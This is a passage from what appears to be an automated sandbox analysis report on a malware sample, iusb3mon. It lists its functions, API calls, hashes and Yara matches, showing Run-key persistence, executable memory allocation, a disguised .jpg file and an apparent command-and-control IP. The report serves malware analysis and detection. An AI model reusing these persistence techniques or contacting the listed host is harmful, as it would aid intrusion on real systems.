                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentTime$CounterExceptionFilePerformanceProcessQueryRaiseSystemThread___std_exception_copy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3658488982-0
                                                                                                                    • Opcode ID: 7d736f9a5c072759fb38d3ff56b4fb5cbb659dba24ca89d17910b140c1d71e92
                                                                                                                    • Instruction ID: d5baf712bedcd8bdf24c1f15617951bb71f9d9aaed425cb673592d23bd5e592d
                                                                                                                    • Opcode Fuzzy Hash: 7d736f9a5c072759fb38d3ff56b4fb5cbb659dba24ca89d17910b140c1d71e92
                                                                                                                    • Instruction Fuzzy Hash: 2A112E30D0020DFBCF04EBF4D849A9EBBB8AF14310F504566E511E6191EB70EB55CA51
                                                                                                                    Function 06241F38 Relevance: 4.5, APIs: 3, Instructions: 39registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 502 6241f38-6241f5e RegOpenKeyExA 503 6241f64-6241f85 RegQueryValueExA RegCloseKey 502->503 504 6241f60-6241f62 502->504 506 6241f87-6241f8d 503->506 507 6241f8f 503->507 505 6241f94-6241f96 504->505 506->507 508 6241f91-6241f93 506->508 507->508 508->505
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,?,062462A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06241F56
                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000001,00000000,00000000,?,?,?,?,062462A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06241F72
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,062462A3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Microsoft), ref: 06241F7D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3677997916-0
                                                                                                                    • Opcode ID: 7ed3abf153d33eac31457180d4dc214d092e45b0936d9f0f385142a1a77d271d
                                                                                                                    • Instruction ID: 1a4fa86dbbcf6ae4b91849679f153db0baadd2218dc5e3c1c5bfd8e866b3a378
                                                                                                                    • Opcode Fuzzy Hash: 7ed3abf153d33eac31457180d4dc214d092e45b0936d9f0f385142a1a77d271d
                                                                                                                    • Instruction Fuzzy Hash: AFF09072911308BFEF216E90DC88DFE7B6EEB04354F058422FE15A6010D7328E55AB60
                                                                                                                    Function 06247B7D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: C:\ProgramData\Program
                                                                                                                    • API String ID: 3519838083-2177086111
                                                                                                                    • Opcode ID: 40b37cc61d3b9a89804eebf1dd6e7ef1facf16d58c53ddb9b54472eb6e9e12ea
                                                                                                                    • Instruction ID: d17b18d547f1250947a2729a1a6f40685ff65733e316526cba182690034f4237
                                                                                                                    • Opcode Fuzzy Hash: 40b37cc61d3b9a89804eebf1dd6e7ef1facf16d58c53ddb9b54472eb6e9e12ea
                                                                                                                    • Instruction Fuzzy Hash: 5A415130A20205CFDB59DF58C980AADBBF1EF58324F2485A9E865D7391C731DE40CB91
                                                                                                                    Function 04D101CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04D1022B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_4d10000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                    • Instruction ID: 216f32c819aa4bd56a9002f64110f8c90bc2873f437e80c5aab3ff68e112038b
                                                                                                                    • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                    • Instruction Fuzzy Hash: EDA16D70A00606EFDB15DFA9D880AADB7F1FF48304F148069E855DBB61E730EA91CB90
                                                                                                                    Function 0624B39D Relevance: 3.0, APIs: 2, Instructions: 45threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0625005D: HeapAlloc.KERNEL32(00000008,06248D56,00000000,00000000,00000000,00000000,00000000,?,06248D56,?,?,06248CE2,?,?,?), ref: 06250153
                                                                                                                    • CreateThread.KERNEL32(?,06248D56,0624B408,00000000,00000000,?), ref: 0624B3DE
                                                                                                                    • GetLastError.KERNEL32(?,06248D56,?,?,06248CE2,?,?,?), ref: 0624B3E8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocCreateErrorHeapLastThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3580101977-0
                                                                                                                    • Opcode ID: 549d1114d7957db217b8384cce192d332bd7b9ec12081bb2fcb1be2b1a7811c7
                                                                                                                    • Instruction ID: 8cefd853609d5802ab5bc36755f153bbba7798608940de6bcebf952ca92e82da
                                                                                                                    • Opcode Fuzzy Hash: 549d1114d7957db217b8384cce192d332bd7b9ec12081bb2fcb1be2b1a7811c7
                                                                                                                    • Instruction Fuzzy Hash: 76F0D6366147166BCB78BF69AC0495B3BA5DF41772B008119FE2482580CB31D8019B61
                                                                                                                    Function 0624ED44 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • HeapCreate.KERNEL32(00000000,00001000,00000000,0624B5EB,00000001), ref: 0624ED55
                                                                                                                      • Part of subcall function 0624EBFC: GetVersionExA.KERNEL32 ref: 0624EC1B
                                                                                                                    • HeapDestroy.KERNEL32 ref: 0624ED94
                                                                                                                      • Part of subcall function 0624EE49: HeapAlloc.KERNEL32(00000000,00000140,0624ED7D,000003F8), ref: 0624EE56
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2507506473-0
                                                                                                                    • Opcode ID: 4003880994d9d12bbb522624bdf0dbb7a371d10391a5c93c6cb00cade3a02dce
                                                                                                                    • Instruction ID: 6f3a2222ad1e32fddbd3c3df246d21a4f2dc14f0c6e3a437a80097b25972af01
                                                                                                                    • Opcode Fuzzy Hash: 4003880994d9d12bbb522624bdf0dbb7a371d10391a5c93c6cb00cade3a02dce
                                                                                                                    • Instruction Fuzzy Hash: 6DF06570B70302DEFBF87B307C4CB293A9ABB80641F124835EED2D41D8EB6081808A12
                                                                                                                    Function 0624A1C0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,062469AD,c:\inst.ini,00000000), ref: 0624A1C4
                                                                                                                    • GetLastError.KERNEL32 ref: 0624A1CF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1799206407-0
                                                                                                                    • Opcode ID: 6c85f90037361986dbbf3bd76b5d01c043f37555ce3dbc6e4edb5d7b4610eaf9
                                                                                                                    • Instruction ID: 2ee4975f753b1cec827aa428edfb0de0ebe763b6a5346b092c555a922e37a9dd
                                                                                                                    • Opcode Fuzzy Hash: 6c85f90037361986dbbf3bd76b5d01c043f37555ce3dbc6e4edb5d7b4610eaf9
                                                                                                                    • Instruction Fuzzy Hash: CEE08C309783028ADBE93FB4DC4D30A7A915F42775F154A44EDB9850E8CB758440EE22
                                                                                                                    Function 0624ACDB Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,06248D56,00000000,00000000,00000000), ref: 0624ADC2
                                                                                                                      • Part of subcall function 0624CFF4: InitializeCriticalSection.KERNEL32(00000000,00000000,06248D56,?,06250113,00000009,00000000,00000000,00000000,00000000,00000000,?,06248D56,?,?,06248CE2), ref: 0624D031
                                                                                                                      • Part of subcall function 0624CFF4: EnterCriticalSection.KERNEL32(06248D56,06248D56,?,06250113,00000009,00000000,00000000,00000000,00000000,00000000,?,06248D56,?,?,06248CE2,?), ref: 0624D04C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$AllocateEnterHeapInitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1616793339-0
                                                                                                                    • Opcode ID: 80508e1521a8d2f5e12f41f600f1f1d690e31e77c064c46eaadf17b9c4732d0c
                                                                                                                    • Instruction ID: 2d33308ec43c6f93989859ec92522618f8677f877bf36875fdf5bd48e309a0fd
                                                                                                                    • Opcode Fuzzy Hash: 80508e1521a8d2f5e12f41f600f1f1d690e31e77c064c46eaadf17b9c4732d0c
                                                                                                                    • Instruction Fuzzy Hash: 5821C832AB0305EFDB98FF68EC45B9D77A4EB00761F144216FD21EB2C8D77499418A90
                                                                                                                    Function 001E0109 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,001D23D4,00000000), ref: 001E013B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: c8193b292433f01626c4418c9c25c2c9538746e06b74d6296b5f2b2320ccbe65
                                                                                                                    • Instruction ID: 9ac9717d1705ada025104e2edc44bba456895e1cae37b640719b6f8d29fc9a9f
                                                                                                                    • Opcode Fuzzy Hash: c8193b292433f01626c4418c9c25c2c9538746e06b74d6296b5f2b2320ccbe65
                                                                                                                    • Instruction Fuzzy Hash: 16E0E531100A91A7D63327639C05B6E368D9F593A0F170122FC489E290CBA0CCC0C1E1
                                                                                                                    Function 0624B4C3 Relevance: 1.5, APIs: 1, Instructions: 20threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2158977761-0
                                                                                                                    • Opcode ID: 006fa1e543f5fdfb75014829c840c534a6542648dd54d3caaa43c64dfb7499a3
                                                                                                                    • Instruction ID: fa0e4ca10a5864bb93ed05093f92d8027364a2bcc41b7364afb44bd67ac770b4
                                                                                                                    • Opcode Fuzzy Hash: 006fa1e543f5fdfb75014829c840c534a6542648dd54d3caaa43c64dfb7499a3
                                                                                                                    • Instruction Fuzzy Hash: A1E0C232E712269BDFEA3BA4EC099AE3625EF40351F044010ED50AA050DF20DD519AE2
                                                                                                                    Function 0624B4CE Relevance: 1.5, APIs: 1, Instructions: 17threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExitThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2158977761-0
                                                                                                                    • Opcode ID: 5d896713a40ccdd72be8bdb0024e3356e1c102b73999492c28643111241e474d
                                                                                                                    • Instruction ID: f33dd6707a48d12bb41ad7996834d52fb714b41af7f7f7e411239a5cfcf9e200
                                                                                                                    • Opcode Fuzzy Hash: 5d896713a40ccdd72be8bdb0024e3356e1c102b73999492c28643111241e474d
                                                                                                                    • Instruction Fuzzy Hash: A0D0A732B756229BE6FA3764FC59A2E2649DF00292B058014FD5099040DF50DD4159E2
                                                                                                                    Function 06241C74 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 9b2f2f5b82fa90f97d10da43bc9fd0ae43d0ccfdc853211cf65100794d33dc81
                                                                                                                    • Instruction ID: d40eb058bf5689b9f74042c055e247db88ea7db84fb32344f8751c9795a702fb
                                                                                                                    • Opcode Fuzzy Hash: 9b2f2f5b82fa90f97d10da43bc9fd0ae43d0ccfdc853211cf65100794d33dc81
                                                                                                                    • Instruction Fuzzy Hash: 74C09B3055C34379FF995710DD4DB657E525B40745F048554B5D5544F4C6F140E4C703

                                                                                                                    Non-executed Functions

                                                                                                                    Function 0624838B Relevance: 250.5, APIs: 71, Strings: 72, Instructions: 296libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,202.79.169.178,00000000,75920F10,06246B62), ref: 062483A5
                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 062483B6
                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameA), ref: 062483C3
                                                                                                                    • GetProcAddress.KERNEL32(?,CreateMutexA), ref: 062483D0
                                                                                                                    • GetProcAddress.KERNEL32(?,ReleaseMutex), ref: 062483DD
                                                                                                                    • GetProcAddress.KERNEL32(?,GetLastError), ref: 062483EA
                                                                                                                    • GetProcAddress.KERNEL32(?,CloseHandle), ref: 062483F7
                                                                                                                    • GetProcAddress.KERNEL32(?,Sleep), ref: 06248404
                                                                                                                    • GetProcAddress.KERNEL32(?,lstrcatA), ref: 06248411
                                                                                                                    • GetProcAddress.KERNEL32(?,GetTickCount), ref: 0624841E
                                                                                                                    • GetProcAddress.KERNEL32(?,WaitForSingleObject), ref: 0624842B
                                                                                                                    • GetProcAddress.KERNEL32(?,GetFileAttributesA), ref: 06248438
                                                                                                                    • GetProcAddress.KERNEL32(?,CreateEventA), ref: 06248445
                                                                                                                    • GetProcAddress.KERNEL32(?,ResetEvent), ref: 06248452
                                                                                                                    • GetProcAddress.KERNEL32(?,CancelIo), ref: 0624845F
                                                                                                                    • GetProcAddress.KERNEL32(?,SetEvent), ref: 0624846C
                                                                                                                    • GetProcAddress.KERNEL32(?,TerminateThread), ref: 06248479
                                                                                                                    • GetProcAddress.KERNEL32(?,GetVersionExA), ref: 06248486
                                                                                                                    • GetProcAddress.KERNEL32(?,GetExitCodeProcess), ref: 06248493
                                                                                                                    • GetProcAddress.KERNEL32(?,ExpandEnvironmentStringsA), ref: 062484A0
                                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemInfo), ref: 062484AD
                                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemDirectoryA), ref: 062484BA
                                                                                                                    • GetProcAddress.KERNEL32(?,MoveFileA), ref: 062484C7
                                                                                                                    • GetProcAddress.KERNEL32(?,MoveFileExA), ref: 062484D4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$LibraryLoad
